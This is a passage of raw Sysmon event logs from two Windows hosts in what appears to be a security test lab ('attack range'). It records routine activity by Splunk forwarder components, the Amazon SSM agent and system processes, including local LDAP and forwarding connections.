Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.260{C8EA50B7-0FB6-6216-D404-000000003802}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.994{C8EA50B7-0FB5-6216-D304-000000003802}48285664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:03.712{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D4A82299A9B5216A2B5ADCD2034DB91,SHA256=993516F7B6006EEEBFEBC3725AFC6457BE42593503C48A843FFB8942A954D5C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:03.350{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F691C64CB917A6759EF9A60D4EAF754C,SHA256=DA35D0613523F8966E528E3A5870078D5B660A5A7E61EB80D4448BA410CDA422,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.782{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98751D845C6F39A865A9435136FB8ED3,SHA256=EB10F5B854E3897B1A024D0DC426D743BE543DA47056007B023EAE7A9E25DA55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.778{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-126MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:04.491{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=385AD06B7E254D528D17ACF39B247AA6,SHA256=60932617087EFC3008F9AF7345AB54EB6C73CE615A6EF76C3BB242E13809516E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FB8-6216-D504-000000003802}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0FB8-6216-D504-000000003802}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.040{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FB8-6216-D504-000000003802}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:04.042{C8EA50B7-0FB8-6216-D504-000000003802}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:05.806{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F9FBCC1F294F8B3B4A179B48D575955,SHA256=8CBA1EDE34B18B9208E92E14E437716400D482441CBBE22170319D589B8CEA3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:05.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12C268E6B405CF265744D13395830905,SHA256=FB5B60E79AE6C9A3E346469DB762F82B69B81273F6C492610246F89CDBE214D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:05.776{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-127MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:03.156{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53327-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:03.156{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53327-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:06.810{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44369FDC04FCD746144E847CE4BB9F7,SHA256=2469ABB4606E0CB29440635FC3B6DBC0F3128D529C020134D7F5A9F78324E847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:06.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C8BCE7F3B1F8FAC321FF969E6D991AE,SHA256=03A3625EF9810283AFDBBB4A5C39FCCC4E881392CB01CB8682FA352AD40A5F51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:03.563{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53328-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:07.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203D62BFC6193D7F030F3E9473CA0FCC,SHA256=F63DA4109AD92CAD839978374A592ABE89157BEFE0D0A4DFB58375413555D0CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:07.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F942E8705BD135DE0ADEEF4C89A0BAF4,SHA256=31DC6C7D042AAFCC8781A67E8152474AFA9FA7E4F9A7D92C80DD7A19A0B9FE14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:08.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BCE95F43FB1C7BA584F066D5BDA6EC5,SHA256=3F1C6F57D1BEBF06630AD0FC6C1DD946D35E20D28902DD198518A1DA1A9F8215,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:06.508{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51249-false10.0.1.12-8000- 23542300x8000000000000000215332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:09.053{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=134CAC6D7C7047BBD8032ED1DD5F8A28,SHA256=3977AE3B6A87D9C1F92E73DBB21754056132D334E5200B657239BE65D5F1424B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:09.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812606498E861522ECE353C96E270454,SHA256=AA43BC2290618492E0063BD52D33E1AA6E89FB539C7C06B73D937186057DEC59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:10.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF998CD4348614C414900B84A5978A5B,SHA256=441F48AE36FF119A95F7A1EB49746DAA65EB08CC646C018CC642AE9BD169F089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:11.491{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AE9038722DCE76052022A71D4FC611A,SHA256=7C510CC4A4750DB9E821092C1C1B8C5034E94C37DF8023CE11929986F4999063,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:08.644{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53329-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:11.091{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E674394189BA57F00C894654546EEC,SHA256=1055E4FD4FF79C7060B4DF3AB8E89B71EE112511477041895B4B21633D5494BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:12.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CF6CF2AD5337171D2EBF44520ACDB22,SHA256=6D90EF3D94F373CCE58EE5AC7F828789E3382024E1CF6E80AD10E2A1F59C28E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:12.107{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=814ABE04771B264D9A90A238DCA5CADD,SHA256=3DF17C97E813BE65108EBA8320E86604CD79EE4A349CB7A28B7BC506D4C0B0A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:11.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51250-false10.0.1.12-8000- 23542300x8000000000000000215337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:13.663{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88DC55FD287746352F68881737EC7B42,SHA256=5EF10C207C724D24212BBFC2DE686EF050C3B924811AF073CD4E7A702C8F05CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:13.122{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047272A5A33B390EC8920F2401C3CFFF,SHA256=B3BC062FA4BC98B1214FAD990F8EA085A78586F09A4A69B57A4A251368244BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:14.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC7BA5BC0C7A73947AB7911C683135A7,SHA256=BE8C65E0B27BFD78967EE1CDA3B170CAF54ABF60C361B6E436655D8F2D540B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:14.154{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D04A4AC2BB580AB005D521DCDD48EB7,SHA256=ACE2B6E154FB1B7FFD22839E5966A6B5D656BC0A23AB27E4F8A7C5AFF411830F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:15.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=874200E92B9FAC04A0A6021A35E1804F,SHA256=93178B9924ED7DEC5D34D22D4B79109BCCE8ACFF73D88D8DCDBD134FB14B76D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:15.185{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52F9F1CD6339BB85BDA132141717D3D0,SHA256=C229818C766A3DD3C9B19202538F84D2E202DA70596B59850B8E20C1D30F6C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:16.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 